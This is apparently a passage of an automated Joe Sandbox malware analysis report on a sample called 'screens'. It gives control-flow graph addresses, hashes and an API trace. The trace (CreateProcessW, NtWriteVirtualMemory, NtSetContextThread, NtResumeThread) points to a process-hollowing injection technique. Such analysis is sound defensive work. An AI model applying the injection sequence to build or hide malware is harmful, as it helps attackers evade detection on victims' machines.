2d54a6b 458->497 484 2d547ef-2d5480e 459->484 485 2d547ea 459->485 488 2d54893 460->488 489 2d54898-2d548aa 460->489 480 2d54aa3-2d54aaa 461->480 481 2d54a92-2d54aa1 461->481 502 2d54854-2d54866 462->502 490 2d549c7-2d549d6 463->490 491 2d549d8-2d549df 463->491 492 2d54756-2d54772 464->492 493 2d54751 464->493 465->451 494 2d54787-2d547a3 466->494 495 2d54782 466->495 467->451 468->451 482 2d54941-2d54950 469->482 483 2d54952-2d54959 469->483 498 2d548fd-2d54904 470->498 499 2d548ec-2d548fb 470->499 508 2d54a41-2d54a58 471->508 473->451 478 2d547b6 474->478 479 2d547bb-2d547d7 474->479 475->451 486 2d54985 476->486 487 2d5498a-2d549a0 476->487 477->451 478->479 479->451 500 2d54ab1-2d54ab7 480->500 481->500 506 2d54960-2d54966 482->506 483->506 484->451 485->484 486->487 516 2d549a7-2d549bc 487->516 517 2d549a2 487->517 488->489 489->451 507 2d549e6-2d549ec 490->507 491->507 492->451 493->492 494->451 495->494 496->451 497->496 504 2d5490b-2d54911 498->504 499->504 500->451 502->451 504->451 506->451 507->451 508->451 516->451 517->516
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D|zJ$i4t:
                                                            • API String ID: 0-2751561044
                                                            • Opcode ID: 44a07e90784553a3be5a1d09bfba34852f4c510e835cc0f30c33baf6b8d06710
                                                            • Instruction ID: 90a66731825c7d12dd2920dda1be85652ae0fe83b78048193262bd0b6a71a402
                                                            • Opcode Fuzzy Hash: 44a07e90784553a3be5a1d09bfba34852f4c510e835cc0f30c33baf6b8d06710
                                                            • Instruction Fuzzy Hash: 57E19974E0421ADFCB04CFA5D4855AEFBB2FF8A300B159559D846AB314C374EA82CF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 520 2d52439-2d524fb 522 2d52502-2d52578 call 2d50158 520->522 523 2d524fd 520->523 529 2d5257b 522->529 523->522 530 2d52582-2d5259e 529->530 531 2d525a7-2d525a8 530->531 532 2d525a0 530->532 537 2d526df-2d5274f call 2d50168 531->537 532->529 532->531 533 2d526a2-2d526b9 532->533 534 2d52682-2d5269d 532->534 535 2d525ad-2d525e6 532->535 536 2d5262f-2d52665 call 2d52d20 532->536 532->537 538 2d526be-2d526da 532->538 539 2d52618-2d5262a 532->539 540 2d525e8-2d525ec 532->540 533->530 534->530 535->530 552 2d5266b-2d5267d 536->552 555 2d52751 call 2d53760 537->555 556 2d52751 call 2d53abe 537->556 557 2d52751 call 2d5429e 537->557 538->530 539->530 541 2d525ff-2d52606 540->541 542 2d525ee-2d525fd 540->542 543 2d5260d-2d52613 541->543 542->543 543->530 552->530 554 2d52757-2d52761 555->554 556->554 557->554
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq$Teq
                                                            • API String ID: 0-2938103587
                                                            • Opcode ID: 9990f972359ec1d671816ef1e4bd39785fd93517670206528008b8179e4c5150
                                                            • Instruction ID: c0a614b9a90fe6d5c00032e352a791a13bfa134a622fa8317e0dddefb310bb29
                                                            • Opcode Fuzzy Hash: 9990f972359ec1d671816ef1e4bd39785fd93517670206528008b8179e4c5150
                                                            • Instruction Fuzzy Hash: 6CA16970E042498FDB09CFA9C8946EEBFF2EF89310F188169C855AB355D775990ACF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 559 d06704a-d067068 560 d0670d6-d06710c 559->560 561 d06706a-d0670ab 559->561 566 d06710f 560->566 562 d0670b2-d0670d4 561->562 563 d0670ad 561->563 562->560 563->562 567 d067116-d067132 566->567 568 d067134 567->568 569 d06713b-d06713c 567->569 568->566 570 d0672a6-d067316 568->570 571 d067141-d067145 568->571 572 d0671e2-d067218 568->572 573 d067242-d067254 568->573 574 d0671c1-d0671dd 568->574 575 d06716e-d0671a4 call d067918 568->575 576 d06728c-d0672a1 568->576 577 d06721d-d06723d 568->577 578 d067259-d067266 568->578 569->570 569->571 595 d067318 call d068393 570->595 596 d067318 call d06899b 570->596 579 d067147-d067156 571->579 580 d067158-d06715f 571->580 572->567 573->567 574->567 590 d0671aa-d0671bc 575->590 576->567 577->567 587 d06726f-d067287 578->587 586 d067166-d06716c 579->586 580->586 586->567 587->567 590->567 593 d06731e-d067328 595->593 596->593
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq$Teq
                                                            • API String ID: 0-2938103587
                                                            • Opcode ID: 16b5a79a32d082284e2684c1ed06887776c982aab3d1d89d62f76aff045e0251
                                                            • Instruction ID: a9e289b572c9ab2285611da603bb59172f8d016f6c267f09c7ceede811ed23c0
                                                            • Opcode Fuzzy Hash: 16b5a79a32d082284e2684c1ed06887776c982aab3d1d89d62f76aff045e0251
                                                            • Instruction Fuzzy Hash: FC910874E042098FDB09CFA9C984ADEBBB2FF89300F24852AD519BB354D7759946CF60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 597 d067088-d0670ab 598 d0670b2-d06710c 597->598 599 d0670ad 597->599 603 d06710f 598->603 599->598 604 d067116-d067132 603->604 605 d067134 604->605 606 d06713b-d06713c 604->606 605->603 607 d0672a6-d067316 605->607 608 d067141-d067145 605->608 609 d0671e2-d067218 605->609 610 d067242-d067254 605->610 611 d0671c1-d0671dd 605->611 612 d06716e-d0671a4 call d067918 605->612 613 d06728c-d0672a1 605->613 614 d06721d-d06723d 605->614 615 d067259-d067266 605->615 606->607 606->608 632 d067318 call d068393 607->632 633 d067318 call d06899b 607->633 616 d067147-d067156 608->616 617 d067158-d06715f 608->617 609->604 610->604 611->604 627 d0671aa-d0671bc 612->627 613->604 614->604 624 d06726f-d067287 615->624 623 d067166-d06716c 616->623 617->623 623->604 624->604 627->604 630 d06731e-d067328 632->630 633->630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq$Teq
                                                            • API String ID: 0-2938103587
                                                            • Opcode ID: b2f2bd44e7af39743d1b31a3c67f8b720eaefdd8adb31f329fdb6713f6ec170b
                                                            • Instruction ID: ac2e149d10288ba830961bdd27eb281a79e34e3e9c1382fddce5098ee4159a12
                                                            • Opcode Fuzzy Hash: b2f2bd44e7af39743d1b31a3c67f8b720eaefdd8adb31f329fdb6713f6ec170b
                                                            • Instruction Fuzzy Hash: B581C474E002198FDB08CFA9C984AAEFBB2FF88304F14942AD519BB354D7759945CF60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 634 2d524d8-2d524fb 635 2d52502-2d52578 call 2d50158 634->635 636 2d524fd 634->636 642 2d5257b 635->642 636->635 643 2d52582-2d5259e 642->643 644 2d525a7-2d525a8 643->644 645 2d525a0 643->645 650 2d526df-2d5274f call 2d50168 644->650 645->642 645->644 646 2d526a2-2d526b9 645->646 647 2d52682-2d5269d 645->647 648 2d525ad-2d525e6 645->648 649 2d5262f-2d52665 call 2d52d20 645->649 645->650 651 2d526be-2d526da 645->651 652 2d52618-2d5262a 645->652 653 2d525e8-2d525ec 645->653 646->643 647->643 648->643 665 2d5266b-2d5267d 649->665 669 2d52751 call 2d53760 650->669 670 2d52751 call 2d53abe 650->670 671 2d52751 call 2d5429e 650->671 651->643 652->643 654 2d525ff-2d52606 653->654 655 2d525ee-2d525fd 653->655 656 2d5260d-2d52613 654->656 655->656 656->643 665->643 667 2d52757-2d52761 669->667 670->667 671->667
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq$Teq
                                                            • API String ID: 0-2938103587
                                                            • Opcode ID: 06d993bf137c51bc74dd7cc4cc4cb4d19cbeee43c19bbc5045d60c6be87ddf88
                                                            • Instruction ID: 6ca00c046e8bef4b3d935ceaf4f4e57a3348b9ed1a955e80c260f785e07e8c08
                                                            • Opcode Fuzzy Hash: 06d993bf137c51bc74dd7cc4cc4cb4d19cbeee43c19bbc5045d60c6be87ddf88
                                                            • Instruction Fuzzy Hash: 8881C274E002599FDB48CFAAC894AAEFBB2FF89300F24852AD915AB354D7709945CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 672 2d5b5b8-2d5b5da 673 2d5b5e1-2d5b5ef 672->673 674 2d5b5dc 672->674 675 2d5b605 673->675 676 2d5b5f1-2d5b603 673->676 674->673 677 2d5b608 675->677 676->677 678 2d5b60b 677->678 679 2d5b612-2d5b62e 678->679 680 2d5b637-2d5b638 679->680 681 2d5b630 679->681 682 2d5b804 680->682 681->678 681->680 681->682 683 2d5b6c6-2d5b6e8 681->683 684 2d5b791 681->684 685 2d5b751-2d5b75e 681->685 686 2d5b711-2d5b731 681->686 687 2d5b7b3-2d5b7c3 681->687 688 2d5b673-2d5b68d 681->688 689 2d5b63d-2d5b64a 681->689 690 2d5b7ef-2d5b7ff 681->690 691 2d5b68f-2d5b693 681->691 694 2d5b80f 682->694 715 2d5b6f1-2d5b70c 683->715 697 2d5b79c-2d5b7ae 684->697 708 2d5b771-2d5b778 685->708 709 2d5b760-2d5b76f 685->709 716 2d5b73a-2d5b74c 686->716 706 2d5b7c5-2d5b7d4 687->706 707 2d5b7d6-2d5b7dd 687->707 688->679 704 2d5b65d-2d5b664 689->704 705 2d5b64c-2d5b65b 689->705 690->679 692 2d5b695-2d5b6a4 691->692 693 2d5b6a6-2d5b6ad 691->693 701 2d5b6b4-2d5b6c1 692->701 693->701 697->679 701->679 712 2d5b66b-2d5b671 704->712 705->712 714 2d5b7e4-2d5b7ea 706->714 707->714 710 2d5b77f-2d5b78c 708->710 709->710 710->679 712->679 714->679 715->679 716->679
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: C<7#$C<7#
                                                            • API String ID: 0-2641965759
                                                            • Opcode ID: 62cc6f6b43474fd08ccaa46015fb569e6da8b350b938104c1a4c54cc53a1f320
                                                            • Instruction ID: 282b6523c3c5b8d39dd8c41792c00caa9557a0618076329d154d5bfec1147b81
                                                            • Opcode Fuzzy Hash: 62cc6f6b43474fd08ccaa46015fb569e6da8b350b938104c1a4c54cc53a1f320
                                                            • Instruction Fuzzy Hash: 8B612470D00269DFCF18DFA5D5886AEBBF1FB89304F10992AD812AB348D7B49A41CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 717 2d508e1-2d50910 718 2d50917-2d509be 717->718 719 2d50912 717->719 723 2d509c4-2d509f6 718->723 719->718 725 2d50a2c-2d50a3a 723->725 726 2d509f8-2d50a2a 723->726 727 2d50a3d-2d50aa1 725->727 726->727 731 2d50aa8-2d50ac4 727->731 732 2d50ac6-2d50ae0 731->732 733 2d50acd-2d51701 731->733 732->731
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <$.W_
                                                            • API String ID: 0-718456861
                                                            • Opcode ID: fd045b7866f610be3a3484c8ea1c4767b6ae07ab624094d4b0b439d2602f86bd
                                                            • Instruction ID: a7e1f28bbfeeb285d3160d1db2d7bda84635bfc4d935e7c7dcaadf4d75a41c39
                                                            • Opcode Fuzzy Hash: fd045b7866f610be3a3484c8ea1c4767b6ae07ab624094d4b0b439d2602f86bd
                                                            • Instruction Fuzzy Hash: D3615375E00658CFDB58CFAAC9446DDBBF2AF88301F14C1AAD409AB364EB745A85CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 753 abecd1c-abece7a 755 abecf32-abecf47 753->755 756 abece80-abecebb 753->756 757 abecf4d-abecf93 755->757 758 abecff7-abecffb 755->758 773 abecebd-abecec5 756->773 774 abecef3-abecf04 756->774 778 abecf95-abecf9d 757->778 779 abecfd1-abecfdc 757->779 759 abecffd-abed03f 758->759 760 abed045-abed096 758->760 759->760 762 abed14e-abed160 760->762 763 abed09c-abed0d7 760->763 765 abed17d-abed18f 762->765 766 abed162-abed17a 762->766 791 abed10f-abed120 763->791 792 abed0d9-abed0e1 763->792 770 abed1ac-abed222 CreateProcessW 765->770 771 abed191-abed1a9 765->771 766->765 775 abed22b-abed26c 770->775 776 abed224-abed22a 770->776 771->770 780 abecee8-abecef1 773->780 781 abecec7-abeced1 773->781 782 abecf0a-abecf2a 774->782 802 abed26e-abed27d 775->802 803 abed283-abed29a 775->803 776->775 785 abecf9f-abecfa9 778->785 786 abecfc0-abecfcf 778->786 790 abecfe2-abecff1 779->790 780->782 787 abeced5-abecee4 781->787 788 abeced3 781->788 782->755 797 abecfad-abecfbc 785->797 798 abecfab 785->798 786->790 787->787 789 abecee6 787->789 788->787 789->780 790->758 806 abed126-abed146 791->806 800 abed104-abed10d 792->800 801 abed0e3-abed0ed 792->801 797->797 799 abecfbe 797->799 798->797 799->786 800->806 804 abed0ef 801->804 805 abed0f1-abed100 801->805 802->803 811 abed29c-abed2a8 803->811 812 abed2b3-abed2c3 803->812 804->805 805->805 809 abed102 805->809 806->762 809->800 811->812 813 abed2da-abed31d 812->813 814 abed2c5-abed2d4 812->814 819 abed31f-abed323 813->819 820 abed32d-abed331 813->820 814->813 819->820 823 abed325-abed328 call abe1318 819->823 821 abed333-abed337 820->821 822 abed341-abed345 820->822 821->822 824 abed339-abed33c call abe1318 821->824 825 abed347-abed34b 822->825 826 abed355 822->826 823->820 824->822 825->826 829 abed34d-abed350 call abe1318 825->829 831 abed356 826->831 829->826 831->831
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0ABED20F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: d3cef7cd1ec71a18a9ce44573763a858fba0649af68ca7e2bb6f84e9d6212b24
                                                            • Instruction ID: b8646a379737ecc3caec19194239ffa1a0270ac8e33eb450761464a96a17db04
                                                            • Opcode Fuzzy Hash: d3cef7cd1ec71a18a9ce44573763a858fba0649af68ca7e2bb6f84e9d6212b24
                                                            • Instruction Fuzzy Hash: C202FE71E002698FEB24CFA8C884BDDBBB1FF49304F1481A9E818B7251D7709A85DF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 832 abecdc0-abece7a 834 abecf32-abecf47 832->834 835 abece80-abecebb 832->835 836 abecf4d-abecf93 834->836 837 abecff7-abecffb 834->837 852 abecebd-abecec5 835->852 853 abecef3-abecf04 835->853 857 abecf95-abecf9d 836->857 858 abecfd1-abecfdc 836->858 838 abecffd-abed03f 837->838 839 abed045-abed096 837->839 838->839 841 abed14e-abed160 839->841 842 abed09c-abed0d7 839->842 844 abed17d-abed18f 841->844 845 abed162-abed17a 841->845 870 abed10f-abed120 842->870 871 abed0d9-abed0e1 842->871 849 abed1ac-abed222 CreateProcessW 844->849 850 abed191-abed1a9 844->850 845->844 854 abed22b-abed26c 849->854 855 abed224-abed22a 849->855 850->849 859 abecee8-abecef1 852->859 860 abecec7-abeced1 852->860 861 abecf0a-abecf2a 853->861 881 abed26e-abed27d 854->881 882 abed283-abed29a 854->882 855->854 864 abecf9f-abecfa9 857->864 865 abecfc0-abecfcf 857->865 869 abecfe2-abecff1 858->869 859->861 866 abeced5-abecee4 860->866 867 abeced3 860->867 861->834 876 abecfad-abecfbc 864->876 877 abecfab 864->877 865->869 866->866 868 abecee6 866->868 867->866 868->859 869->837 885 abed126-abed146 870->885 879 abed104-abed10d 871->879 880 abed0e3-abed0ed 871->880 876->876 878 abecfbe 876->878 877->876 878->865 879->885 883 abed0ef 880->883 884 abed0f1-abed100 880->884 881->882 890 abed29c-abed2a8 882->890 891 abed2b3-abed2c3 882->891 883->884 884->884 888 abed102 884->888 885->841 888->879 890->891 892 abed2da-abed31d 891->892 893 abed2c5-abed2d4 891->893 898 abed31f-abed323 892->898 899 abed32d-abed331 892->899 893->892 898->899 902 abed325-abed328 call abe1318 898->902 900 abed333-abed337 899->900 901 abed341-abed345 899->901 900->901 903 abed339-abed33c call abe1318 900->903 904 abed347-abed34b 901->904 905 abed355 901->905 902->899 903->901 904->905 908 abed34d-abed350 call abe1318 904->908 910 abed356 905->910 908->905 910->910
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0ABED20F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 6a63a8f8b0e240c12b8025e401533731c85050dc353348f7603ae56005668fdc
                                                            • Instruction ID: 03046b9aea74fbb01ed736da044aa374ad122b3048a04362a285a8fa3fcc9138
                                                            • Opcode Fuzzy Hash: 6a63a8f8b0e240c12b8025e401533731c85050dc353348f7603ae56005668fdc
                                                            • Instruction Fuzzy Hash: 0C02EFB0E01228CFDB24CFA8C880B9DBBB1FF49304F1481A9E419B7250DB74A985DF55
                                                            APIs
                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDEA0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: MemoryVirtualWrite
                                                            • String ID:
                                                            • API String ID: 3527976591-0
                                                            • Opcode ID: 06017eeeda00c357bb0a6c5138a025dede593b6094162f89eb8dab52a6da0f2c
                                                            • Instruction ID: b8cdb385ed6c52d771e546c21fccb7d41a6c41155dd691f520cb79ad6f230937
                                                            • Opcode Fuzzy Hash: 06017eeeda00c357bb0a6c5138a025dede593b6094162f89eb8dab52a6da0f2c
                                                            • Instruction Fuzzy Hash: 854199B5D012589FCF10CFA9D984AEEBBF1BB49310F24902AE814B7210C779AA46CF54
                                                            APIs
                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDEA0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: MemoryVirtualWrite
                                                            • String ID:
                                                            • API String ID: 3527976591-0
                                                            • Opcode ID: 49072deb1a5b7a1d7b9ba2b7c79fdab4f37f76a43c03add4488570b5dc073ee9
                                                            • Instruction ID: a66894933f4a7b7ef9e1fd145ddbb5bcce7a5ed2b2f92d7a627f4f2f8ef355ba
                                                            • Opcode Fuzzy Hash: 49072deb1a5b7a1d7b9ba2b7c79fdab4f37f76a43c03add4488570b5dc073ee9
                                                            • Instruction Fuzzy Hash: A641AAB5D012589FCF10CFA9D984AEEFBF1BB49310F24902AE814B7210D779AA45CF64
                                                            APIs
                                                            • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDAAA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: MemoryReadVirtual
                                                            • String ID:
                                                            • API String ID: 2834387570-0
                                                            • Opcode ID: b0c3ac591f7917bdcdabab7d891be879078c4c6a5aaa3b742369395c3d935fbf
                                                            • Instruction ID: d8d74bdb9f2d31ded1b2de4149278a8b2c62b5aad35058b1e137564d02d5d70d
                                                            • Opcode Fuzzy Hash: b0c3ac591f7917bdcdabab7d891be879078c4c6a5aaa3b742369395c3d935fbf
                                                            • Instruction Fuzzy Hash: 2B41BCB5D04258DFCF10CFA9D884AEEFBB1BB49310F14942AE815B7200D775A946CF64
                                                            APIs
                                                            • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDAAA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: MemoryReadVirtual
                                                            • String ID:
                                                            • API String ID: 2834387570-0
                                                            • Opcode ID: 28b524ac90008a1e5816a28655802597e86d5077a09ad25659a1406ae4f83cda
                                                            • Instruction ID: e5caeee86737b588d266c1ee64f255b5576ecdbbf497d878cb7872e173927d8f
                                                            • Opcode Fuzzy Hash: 28b524ac90008a1e5816a28655802597e86d5077a09ad25659a1406ae4f83cda
                                                            • Instruction Fuzzy Hash: 0841ABB5D04258DFCF10CFAAD880AEEFBB1BB49310F14942AE815B7210D775A945CF64
                                                            APIs
                                                            • NtSetContextThread.NTDLL(?,?), ref: 0ABEDFD7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: 7d4f1fb6c33d58127f1c6c40ddcf26622eb6e6c1dddabfbcf38493ae49b8d14d
                                                            • Instruction ID: a9f2fe0c0fb1e74829c51adb5604d526aaaca3a9bc0e070b633a7e8fd3aaaf13
                                                            • Opcode Fuzzy Hash: 7d4f1fb6c33d58127f1c6c40ddcf26622eb6e6c1dddabfbcf38493ae49b8d14d
                                                            • Instruction Fuzzy Hash: 5641A9B5D012589FDB14CFAAD884AEEBBF1FF49310F24802AE415B7240C779A94ACF54
                                                            APIs
                                                            • NtSetContextThread.NTDLL(?,?), ref: 0ABEDFD7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: 0d1ed9248c21ead9c7f334099618d729e24d20e5fa2b169e701f0c5211045174
                                                            • Instruction ID: 2cadc32dc1a84f1ac766ff765c06a78f14e4524dd8f4907d5d0fafa133de38e1
                                                            • Opcode Fuzzy Hash: 0d1ed9248c21ead9c7f334099618d729e24d20e5fa2b169e701f0c5211045174
                                                            • Instruction Fuzzy Hash: CF31BBB5D012589FDB14DFAAD884AEEFBF1BF49310F24802AE414B7240C778A945CFA4
                                                            APIs
                                                            • NtResumeThread.NTDLL(?,?), ref: 0ABEDC39
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 8cab46dc40e68c569a32368b284661e3878ac40045b13c5c884a22f961d111f5
                                                            • Instruction ID: cbbfc392080cc565fa2d7605a6ecba21fc36741b37215f9c0c0a4add546dc2bd
                                                            • Opcode Fuzzy Hash: 8cab46dc40e68c569a32368b284661e3878ac40045b13c5c884a22f961d111f5
                                                            • Instruction Fuzzy Hash: F23199B5D012189FCB24CFA9D984AEEFBF1BB49310F24942AE815B7300C775A946CF54
                                                            APIs
                                                            • NtResumeThread.NTDLL(?,?), ref: 0ABEDC39
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: d8f8e068f37b1dc34bb44b871f4812d44dccebb18069147a02ef41b16ae7ceb6
                                                            • Instruction ID: f0a34256c07a117acc7ee3c33f2d2521dcef85d302b52070fea222130c33c654
                                                            • Opcode Fuzzy Hash: d8f8e068f37b1dc34bb44b871f4812d44dccebb18069147a02ef41b16ae7ceb6
                                                            • Instruction Fuzzy Hash: 3431A8B5D012189FCB10CFA9D980A9EFBF1BB49310F24942AE815B7300C775A946CF94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <
                                                            • API String ID: 0-4251816714
                                                            • Opcode ID: 0411af2c1f6ba5929e23acffb9cf6f3e5c49540923e67be6d00b8ab99f4f4d2a
                                                            • Instruction ID: 5f408c9d9b055ea304931469f6718e28919d593d16c2012e8bc03ca42663dbe7
                                                            • Opcode Fuzzy Hash: 0411af2c1f6ba5929e23acffb9cf6f3e5c49540923e67be6d00b8ab99f4f4d2a
                                                            • Instruction Fuzzy Hash: 08916275E01658CFDB54CFAAC9846DDBBF2BF89301F14C1AAD409AB225D7349A81CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LV=
                                                            • API String ID: 0-142187384
                                                            • Opcode ID: 1324ee208615ed76f35f29209b28b3560c379d78c486bbfbf767f0fe27988c10
                                                            • Instruction ID: 2f647115790d8ddb941a96e1cef3e9f35067e7ec3fe87e3ae1ce2f52e513be54
                                                            • Opcode Fuzzy Hash: 1324ee208615ed76f35f29209b28b3560c379d78c486bbfbf767f0fe27988c10
                                                            • Instruction Fuzzy Hash: 5771B2B4E01219DFDB08CFE5D884AAEFBB2FB88301F14812AD919AB358D7745945CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &[
                                                            • API String ID: 0-1761963930
                                                            • Opcode ID: b3e238d9b70f2790ad5426a025d475a91efc3f8df77cbaf908be1dc5f572f6fe
                                                            • Instruction ID: aa05ffff380093604fc93c2fb42240cb0fab29d789c6e53dd012ee246e7748b4
                                                            • Opcode Fuzzy Hash: b3e238d9b70f2790ad5426a025d475a91efc3f8df77cbaf908be1dc5f572f6fe
                                                            • Instruction Fuzzy Hash: 73512C70E0420A8FEB08CFA5D5406AEFBF2BFC8304F14D56AD559A7254D3749A01CFA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
